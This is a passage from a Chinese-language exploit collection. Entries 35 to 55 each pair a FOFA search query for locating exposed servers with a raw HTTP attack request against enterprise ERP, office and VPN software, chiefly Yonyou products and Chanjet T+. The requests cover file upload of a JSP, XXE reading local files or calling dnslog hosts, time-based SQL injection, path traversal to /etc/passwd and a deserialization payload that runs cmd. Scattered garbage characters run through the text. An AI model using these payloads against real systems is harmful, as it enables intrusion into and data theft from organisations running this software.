Content-Type: application/x-www-form-urlencoded- n, A1 f6 C1 x# U
Accept-Encoding: gzip, deflate4 e/ U! }3 g0 d6 B- F8 j' n
Accept: */*$ d$ D% M6 m4 t% X
Connection: keep-alive4 q6 ^. o6 W! C: }# G
9 t" l4 C$ ]$ x C8 A" F# K h3 D2 u3 h
35. 用友NC-Cloud importhttpscer任意文件上传+ O: P6 Q3 L5 D( \& E& X
FOFA:app="用友-NC-Cloud"# t5 m8 Q8 j% |
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1. u7 T/ a* d7 U. _+ [
Host: 203.25.218.166:8888
5 S* E) Q4 [! c5 j& |! Z' vUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info5 G+ o- ^' F3 d( W) Y9 i$ B
Accept-Encoding: gzip, deflate
/ O L4 D# Z; q5 |% ?0 @. ~) ]Accept: */*- j) Q4 e( _3 e* o5 ~, L
Connection: close
9 i* A6 ?( O' a; j2 L6 \accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA" I3 {( s& b o9 E$ A2 n
Content-Length: 190& ?4 y. r) i5 k( w' H6 Y a) G
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
2 E9 M2 h* h P
6 c5 k: i3 v* F) i--fd28cb44e829ed1c197ec3bc71748df0; \( j y# f: l% G) s, M
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
( l }5 F( I5 Y1 U7 ]' c/ a# k+ n$ C* K
<%out.println(1111*1111);%>
6 A6 l6 O$ Z$ g0 ]7 m; p2 [--fd28cb44e829ed1c197ec3bc71748df0--9 l. C* N- ?& Y( m L( T6 f" ?
( L. Q7 i% e% F( {1 q0 p6 v
$ p/ |* P' O* o, g8 [( l36. 用友NC-Cloud soapFormat XXE
% l1 X$ T6 u8 t U$ y# |: DFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"$ F c( ]1 j2 ? |
POST /uapws/soapFormat.ajax HTTP/1.1 Z4 t1 z" a Q; a. g! }6 P
Host: 192.168.40.130:8989! {$ e8 Y' O% A; }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.04 P; P& H6 p9 K! R/ u0 u
Content-Length: 263, ~, B( g/ ~8 c( V7 g& W- U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 n4 }. x9 n1 Q$ G: U' T
Accept-Encoding: gzip, deflate
. z, O, q0 m, n5 M5 o5 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 z' W Q+ c1 a6 k5 oConnection: close
: N3 d( X3 L/ p7 l" |' r9 IContent-Type: application/x-www-form-urlencoded
4 d, P* z" m: f: o* _4 HUpgrade-Insecure-Requests: 1( ]3 c6 G$ [5 F3 b Z6 S# \
; p+ ~0 K6 a0 Q5 h- N3 d+ l$ l' v
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
, b/ @2 t+ R* j, y
7 A! n& V, N; U2 c/ U$ E3 F# g7 u+ Y) p* P8 A
37. 用友NC-Cloud IUpdateService XXE( F- i7 C" Q( \1 Y, i
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"1 K6 W7 ?5 w0 l; L5 m
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
/ O5 Y' h% B' K! m, _8 |1 bHost: 192.168.40.130:8989
$ Q" J2 O) c8 c( @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
3 @" Y. Q |0 c2 `Content-Length: 4212 M/ ^+ H7 ~7 S+ I* |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
, V9 t9 R3 U4 AAccept-Encoding: gzip, deflate
7 Y- I$ K1 f0 E. \Accept-Language: zh-CN,zh;q=0.9
, V* T( U' A/ w$ ~% z6 F( wConnection: close
# ^3 V% @( p3 t) b+ M* }Content-Type: text/xml;charset=UTF-8
6 b( O% F6 c$ b" ]& S- WSOAPAction: urn:getResult% n/ f3 N2 c2 a' q# l
Upgrade-Insecure-Requests: 1
" a9 F' t0 d: x
6 {( s) q/ W" o8 J( q8 ]( O<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">% U7 `# r* s4 t+ n1 X* |9 S6 r! |
<soapenv:Header/>, R. c- v! s0 G; l0 H4 @8 e
<soapenv:Body>& X% ]+ O; B8 t5 d
<iup:getResult>
# J+ @9 B( ?# b/ ]( }4 G8 p- w: N2 U<!--type: string-->
) z r3 x8 J2 d( m+ [6 d<iup:string><![CDATA[
! ]6 P4 ?+ Q6 p3 r0 [<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
5 u# ^. E0 Z- G<xxx/>]]></iup:string>( S3 I- |8 e; S& x9 W6 y6 u' U
</iup:getResult>7 m0 I4 \9 c$ @% ~3 _$ V
</soapenv:Body>; ^; H+ G4 A- h% H' ~8 t6 I
</soapenv:Envelope>
8 a t$ q4 b7 |6 M0 e, H! L( X2 h9 a8 h9 J2 M2 G- Z6 k
* \2 k4 I! N+ d9 B* N
1 A# ~6 h8 e6 o$ r" m
38. 用友U8 Cloud smartweb2.RPC.d XXE3 C0 R8 [* g' \8 n. q m- I& {
FOFA:app="用友-U8-Cloud"- I- ]# D9 P+ g6 D
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
! F* U% W# T) P' X a- a: FHost: 192.168.40.131:80880 M$ s3 N0 u+ i. c( ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
+ q, `. G! D* q* ?Content-Length: 260" ]6 |& \- x1 e6 s& S/ |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
# D& @" |0 s% f- \9 m! }6 H+ UAccept-Encoding: gzip, deflate3 T7 J" T" W0 A
Accept-Language: zh-CN,zh;q=0.9
) j; ]- ]) e' p" xConnection: close. v/ N, W6 W% o
Content-Type: application/x-www-form-urlencoded
4 l1 k) K6 J& A* ~, _2 {7 v# j7 N; C3 j# G! [* L& T3 _
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>0 @: w" y+ g5 t" Q9 D
7 N$ C- g; V0 N) s( Y* o1 s n
+ r4 K: R; h/ U$ d" X6 u# ]
39. 用友U8 Cloud RegisterServlet SQL注入/ q, v- V- ?0 z, O* I0 H, X. P
FOFA:title="u8c"
1 [- e8 E& }* u2 X. ]! `& w' |: IPOST /servlet/RegisterServlet HTTP/1.1$ J Z9 F: W- F/ q% W
Host: 192.168.86.128:80898 J' p8 q) h! x" B- H2 n4 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
6 p0 @, t1 g% s" F+ Q2 MConnection: close
* w3 _ Q) p- B7 v( fContent-Length: 85
) ]0 X- m C& `( Q; s) y4 a' QAccept: */*6 d- _5 \: f0 o( b
Accept-Language: en4 B) ? H+ U! }: Q" P% h
Content-Type: application/x-www-form-urlencoded" t0 e+ Z9 l1 g% [, @
X-Forwarded-For: 127.0.0.1
z2 N9 L( U4 w5 E( J" D" L+ sAccept-Encoding: gzip- B* r: `6 ]4 [! c* p0 d
1 l3 @4 r- y% F F7 wusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
( c, \1 p( Z" O" @! ]9 H& v" [7 E& W& v" c+ ~. N/ a
( O5 Q; W5 _% B) P' x- Z* @
40. 用友U8-Cloud XChangeServlet XXE
) e2 i. G3 q( `FOFA:app="用友-U8-Cloud"1 \9 {7 N+ ^ \ c: r) e% B' t* a
POST /service/XChangeServlet HTTP/1.1
* {# |" b' A6 i' n4 I' u' g+ THost: x.x.x.x* E- w+ N0 j" P: U+ S3 O$ B; Z# T
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36; X& y+ U9 B: |9 e. r. k4 H
Content-Type: text/xml# s. l* ~. F* h B+ @
Connection: close+ Z' M: `' F3 N4 ^5 G$ h
& J: ? i* w0 P* I2 b3 g' L
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>9 c' r/ w: z" k. x/ a" Z
( k9 |( y7 J5 k T. N
$ q4 Y, a6 g# L" m5 {41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
5 q! e/ q0 P i) jFOFA:app="用友-U8-Cloud"! M) U( F% p! Q+ x
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1, D0 I3 D* F" T5 [4 X. s
Host:$ I$ [, M7 j9 M) q& g7 W# v3 f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 W5 W* I' V- q. n' V# LContent-Type: application/json+ K- @! }# m2 v1 F
Accept-Encoding: gzip7 D8 `; H* ~8 d; q( B1 _4 n
Connection: close
8 d9 M. H0 E9 j5 I
8 y: v0 g2 j1 T$ D! y5 E! Y& g5 }. x3 k
0 b& c( l$ ^+ {" S8 h42. 用友GRP-U8 SmartUpload01 文件上传/ r! D- D: Q% p( t$ r
FOFA:app="用友-GRP-U8"
; n4 [, Y& d& h) pPOST /u8qx/SmartUpload01.jsp HTTP/1.18 {3 Z# m% y6 q: v" t- ]% ^
Host: x.x.x.x5 F) V# i; e; ~' Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt# g% |$ V7 G2 R3 W9 N, v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.362 v; u+ @7 o; T+ P4 F0 @
, m- F2 q, j" K! y4 l4 o8 TPAYLOAD
, i# h1 C- b+ J6 G: ^: W$ n V$ s7 ~+ k
5 l( r3 D$ l# j7 Z$ a N- x7 xhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
$ @ t0 c$ Z _* y: d. o$ c6 A
6 Q2 d U, f3 {# c43. 用友GRP-U8 userInfoWeb SQL注入致RCE" {3 \& F& @& ]1 {( R [
FOFA:app="用友-GRP-U8"+ s; w0 s+ N6 t3 m, \2 k/ |
POST /services/userInfoWeb HTTP/1.1) e+ Q7 t$ E* n2 L
Host: your-ip
8 M0 f7 C+ D) V; v* CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 v4 Z& c n7 r- P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 B- P+ ?$ E% C" |* I4 vAccept-Encoding: gzip, deflate
, T$ E5 f* O; E' @! F# [1 fAccept-Language: zh-CN,zh;q=0.97 X/ J f" [0 Q3 V. f' ]1 f$ V$ L. n
Connection: close
6 G, k/ @) S4 MSOAPAction:
; p" k+ t3 P- C5 o" y4 Z6 OContent-Type: text/xml;charset=UTF-8) T7 g" F# f. @ ]: e) z* _
9 x; H1 a M$ L' z$ J<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
4 T1 u/ A! x: {+ q( S! X <soapenv:Header/>
) I1 i n/ H" x! W <soapenv:Body>& K1 D7 e6 S4 P3 o1 I3 U* @% E
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">2 x+ D, R# _! Y A, b5 w5 o
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
6 u1 u! W1 r' [ </ser:getUserNameById>
- T8 g1 |* q4 f9 J7 v </soapenv:Body>
h5 f# R" y) s/ f0 }</soapenv:Envelope>
) W& ]3 q6 h* C3 _; o N& l* K# Q% ?0 r6 M* |4 v
2 D$ ^( B' B' l1 G% ?44. 用友GRP-U8 bx_dj_check.jsp SQL注入% W7 m" P0 }" P& h0 h0 N
FOFA:app="用友-GRP-U8"
: ]+ p; P# \, @! d* xGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1" ~ f+ s8 h, p5 _) C% @
Host: your-ip
Y1 q( p ~8 O0 K DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Y8 E# j3 y3 W- M, [/ H2 d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) c4 H$ E- V: v/ z; X4 A# W9 a6 ?6 z
Accept-Encoding: gzip, deflate: W# N. e2 J! `. U
Accept-Language: zh-CN,zh;q=0.9
( \( O6 n/ J) G4 K) g& O" TConnection: close
4 @6 k( r* ~1 c
, _4 |% Q3 S! I. C- n( X/ H3 \# J; J( R f: m% W
45. 用友GRP-U8 ufgovbank XXE
) G+ v3 o. k& i5 o; R* Z; k5 JFOFA:app="用友-GRP-U8"
6 e, p4 S4 i$ _8 \POST /ufgovbank HTTP/1.1* ~) {, S/ N8 E* z% @6 q' t
Host: 192.168.40.130:222
/ Z% E+ J \# N0 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
0 `' t C$ J' m4 X# ZConnection: close H7 _6 B9 R, x) f% _' T( J0 Y6 ]
Content-Length: 1615 b7 [5 O/ [# F4 Q$ U* k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 {% @) }9 p3 y2 n" H: r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 K+ A/ h- }$ \# |! H! IContent-Type: application/x-www-form-urlencoded
7 k& M5 j; J- L: v8 z# G; s; GAccept-Encoding: gzip
' V% @* f. g4 L1 Q- T3 l
4 M/ E5 }: Q0 x3 [reqData=<?xml version="1.0"?>3 \& b6 N4 ~' l% O
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
! \% C4 F' B; c7 I7 A) u% q; }# t7 V3 S% A# }
( A6 s2 l( A' k7 m4 y* z9 q
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
1 W+ _- x0 E7 AFOFA:app="用友-GRP-U8"* l7 ^( i' d: x7 b
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1& V# H. d3 y+ {0 J4 h; }. G
Host: your-ip
5 ?' h! S+ i2 Y v: J0 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
" h1 y6 X. w2 v' ?& Y4 s; uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( z4 }8 |; c3 E" L" m1 ZAccept-Encoding: gzip, deflate
! R8 n) U1 n9 u0 O/ l+ `Accept-Language: zh-CN,zh;q=0.9) ]: p2 \0 Z( E4 _: q
Connection: close
& w( z7 ?" D7 ^6 B; L, f
3 N4 S d' e# f* M9 ?1 ?7 j. X2 D2 V ] H1 z4 a% P
47. 用友GRP A++Cloud 政府财务云 任意文件读取
! t) s5 ^! B( J1 k$ I9 G1 f0 oFOFA:body="/pf/portal/login/css/fonts/style.css"/ C% B) T6 l3 |9 q
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.11 |# U) C" x2 x+ o! M, g+ m8 A0 P
Host: x.x.x.x
+ _% @5 Z/ |7 G0 q3 N5 sCache-Control: max-age=0
1 A7 v( q- p& H4 c) L$ fUpgrade-Insecure-Requests: 1
5 _5 Q ^( f. U `2 p# Q& p; YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
# R% D1 p5 H6 _; F4 ?. P+ m% ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% z* k$ Q- M. R ]
Accept-Encoding: gzip, deflate, br/ R. [# z1 F8 i6 [) _0 i% K; e" Y
Accept-Language: zh-CN,zh;q=0.9. @7 G( I+ s9 D0 f- B
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
" b* ^' L+ `/ \7 O2 D; D' {! yConnection: close
1 B0 I* J% L6 Y& H6 N/ C+ G; g3 o
) k; F" s6 R4 f
6 Z, K/ e( V) E! _3 O9 W48. 用友U8 CRM swfupload 任意文件上传: ^3 J4 ^3 x+ p! M) d( ]
FOFA:title="用友U8CRM"
% u6 T, \) _) X1 JPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1( W2 V8 W3 m1 J( |5 }
Host: your-ip
9 ?& }9 ^- g5 s: X- F$ `% uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: Q! e7 m6 n% sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ J6 a+ p7 ^+ p t* Z7 P8 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& p6 u1 B# m+ E) [Accept-Encoding: gzip, deflate! B8 }) ~9 {0 m% P
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
- X2 ?8 X: Z& e* b; |) L$ U' }------269520967239406871642430066855( k6 R) C6 Q" I9 }+ D$ h% b. T$ B
Content-Disposition: form-data; name="file"; filename="s.php") u8 r& ]" {9 p# g
12317 t5 [7 q7 ~" ]% ` S) q
Content-Type: application/octet-stream6 l7 b* e0 l, y, f
------2695209672394068716424300668550 J1 a! i2 d K L: ?) S3 s ~" a
Content-Disposition: form-data; name="upload", ^% }$ ^0 i2 U5 y5 R
upload+ ^5 I) L$ s {2 h$ ?! R
------269520967239406871642430066855--; h0 u0 o; X2 U. A" E$ h
, Y: x) h1 O! Z& P" l: {& a5 C2 W' @2 @+ V# e8 z* k
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
) i3 F# r& o: b6 NFOFA:body="用友U8CRM"* j; I4 ]) F& v* m; E8 v
8 ]- t( M2 R6 Y
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
( k3 P8 c% p' [: }, ^6 C) \( QHost: x.x.x.x
2 v% J, ?9 z4 ]" V: cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, r- K3 \1 L0 D% s
Content-Length: 3291 I' Y( {. p" {* f; g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( A9 D" q- J( r
Accept-Encoding: gzip, deflate
+ M# q3 q n" U/ h; c0 s1 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, p) t2 C4 G: A5 }# I3 x: @Connection: close: e3 Q! C; I1 o% d" B
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w# T, s% s) P+ p7 u6 A: \
. P+ p" v* w4 E) E. A-----------------------------vvv3wdayqv3yppdxvn3w
2 c! j1 j* D. B- n6 {* `6 S2 dContent-Disposition: form-data; name="file"; filename="%s.php "
8 e* e1 o5 n+ A0 \Content-Type: application/octet-stream
$ Z9 J7 Z( v. f
. T% i6 F1 M1 g+ H# lwersqqmlumloqa- q0 [1 K' |) A6 r0 T
-----------------------------vvv3wdayqv3yppdxvn3w o0 L6 k$ v: m+ O
Content-Disposition: form-data; name="upload"
+ _' H* l( L* S3 p i/ J- Y3 u9 S" V
upload
/ |# ^0 G5 _( J: x3 }$ @-----------------------------vvv3wdayqv3yppdxvn3w--+ B a2 [: G0 r) u" ?5 N$ C- c
4 [3 J& n/ a- B
% D* H. r9 _9 _+ @9 d& P' ghttp://x.x.x.x/tmpfile/updB3CB.tmp.php: }* Y; O0 u* M9 ^& d% s
7 ~$ }# k( D' v6 }, Z5 x
50. QDocs Smart School 6.4.1 filterRecords SQL注入
- b# S# j# E. V2 A. G$ R! HFOFA:body="close closebtnmodal"
1 g/ Q, D3 k4 a& u! v0 V# C! K/ rPOST /course/filterRecords/ HTTP/1.1
/ p; ]$ J8 D: n% \Host: x.x.x.x: B' g6 w6 v+ }! H, n
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
- O/ x2 n' Z5 m) ^, @Connection: close
6 ]6 }; V& I W5 PContent-Length: 2240 }" e, X: O3 U! _- z1 Q+ ]
Accept: */*
4 y8 D5 v5 Q5 i3 U' HAccept-Language: en/ W( K+ \0 }5 [
Content-Type: application/x-www-form-urlencoded
4 D e% X! y* Q/ @; q G8 f( V1 \Accept-Encoding: gzip
* U: m# m" ]0 q; k% B4 K
7 n1 |! U$ s* y- c7 Hsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
# C, N; d/ T, z, ]! @( x; D' x2 ^% }; W; j1 h& ]" x+ h2 C
; r3 ]; V$ R7 h& d! U6 c51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
0 i+ \; i5 k6 C# t, xFOFA:app="云时空社会化商业ERP系统"
/ k0 [: J, ~5 v S R8 q0 pGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
2 f- v. V- j/ Q. iHost: your-ip
2 W/ O9 `! R5 o& @$ uUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Y6 ?7 B$ A8 o0 u- S# D6 b8 T6 v- `( mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
# ?* E0 b: J! m) K5 w; |% bAccept-Encoding: gzip, deflate
5 W) I. }: q2 w9 |! B* I# I8 A2 J7 ]Accept-Language: zh-CN,zh;q=0.92 e1 V4 [4 |& \* Y1 [
Connection: close
* m. U h; X( ^. A( l. ?7 f; ^( N5 Z4 q) u! Y2 Y& A7 x f+ b/ U
2 f9 V( @/ s+ F2 b% W5 r) {
52. 泛微E-Office json_common.php sql注入$ S# _; B( q- G0 u8 [6 F
FOFA:app="泛微-EOffice"
: O7 _4 v& O5 L. @' p5 i% KPOST /building/json_common.php HTTP/1.1
/ t k% _; t9 G( Q* l2 w1 E8 pHost: 192.168.86.128:8097# e7 p* ~5 r X4 s6 i
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* `! H/ j/ E8 C# U+ x2 x8 a; VConnection: close1 d! W w3 y; P" W8 N6 H
Content-Length: 87
8 O. N5 c! S6 \4 T2 h5 R! BAccept: */*
6 V+ f3 _" W; m4 n( J; |) U4 FAccept-Language: en( P: C1 }( e% c0 O! r) g, T
Content-Type: application/x-www-form-urlencoded
, z r+ g' \" I# y8 i+ z4 hAccept-Encoding: gzip
( E# O7 S( F$ M6 }3 n. n
* u. g( ^9 f0 F6 d- I0 ]0 V5 `tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
& w, \4 ?( `& }, q. l" |1 e, ?4 H+ @& K3 q3 B ?& @ E+ k- b; k
' s6 Y5 {( g' \/ |6 J# Y* j
53. 迪普 DPTech VPN Service 任意文件上传$ \! T- a+ a* v2 k: p& H
FOFA:app="DPtech-SSLVPN"
, [' H! M* F& ^3 M8 l& R) @/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd4 [9 X3 o ?) \; P( l( z- B
/ k8 M3 j( s5 @1 A% [1 {, A
5 c1 |# n8 ]& x8 J- m! m# ?54. 畅捷通T+ getstorewarehousebystore 远程代码执行0 b" V* e5 {* S( u( H/ B
FOFA:app="畅捷通-TPlus"$ s2 j' X0 e; o- J4 l% \) D! p
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件 h$ n) ~4 i, k+ S
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
4 K e/ I0 N n& A3 | }: E! j* k9 S* w r
% M( v) S/ V: b# e9 G) ~
完整数据包
" Y V1 G" e( A. V. XPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
, A/ T; }) M( S% ?; SHost: x.x.x.x) o; F1 O, U& ]% ~0 c
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
' L. P% @6 n! F4 F& \4 fContent-Length: 593
4 j" f( h" c( F$ S! ]8 w$ _' C, d; O1 z* b6 j/ c& ^
{
3 A/ i' h+ I& w9 s"storeID":{
, Q/ H6 H6 _" t4 E& Z "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
3 I# c8 o7 S1 x" V2 @# I "MethodName":"Start",
, q0 j; C" J0 Q+ N "ObjectInstance":{1 V) {- p Q0 E$ F8 G6 f4 S" @% l
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0 f. P" N( t6 R, e
"StartInfo":{
2 X a) R1 U" Q3 X. ? "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* l) a1 n$ y; { {( h2 H9 s7 v; f
"FileName":"cmd",7 O" y, {* ~, }5 z1 l4 A( S
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"0 T' F) o# ~) X( ?0 x6 q2 ]' j
}
- n! X2 x# v. `) b }
v# O2 K- U% w; I/ U }
, y* ?; {0 u' t% o- i}8 c7 P% R* g( ] u5 d+ {5 x
) J5 I1 i$ k; |0 D/ E- b5 w/ `
( x+ ~6 v7 C" q- O& p第二步,访问如下url4 `' G" h1 r2 Z
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
) n2 B* f- z# c: b3 _8 S8 _$ I* ~# f( l# Z6 h
, n+ a7 O( h6 r1 s+ Q) E55. 畅捷通T+ getdecallusers信息泄露
6 b2 b D; N# x, f6 t( ]4 ~FOFA:app="畅捷通-TPlus"6 \! J& v) `, g) k
第一步,通过' O" p" i3 o) Z+ g; f
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
8 a- B# {, B( Z+ `第二步,利用获取到的Cookie请求
8 E2 u) \1 ~3 L/ R/ Z3 B/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers x$ j. E; @# Z1 {
7 O2 i% [3 s( R
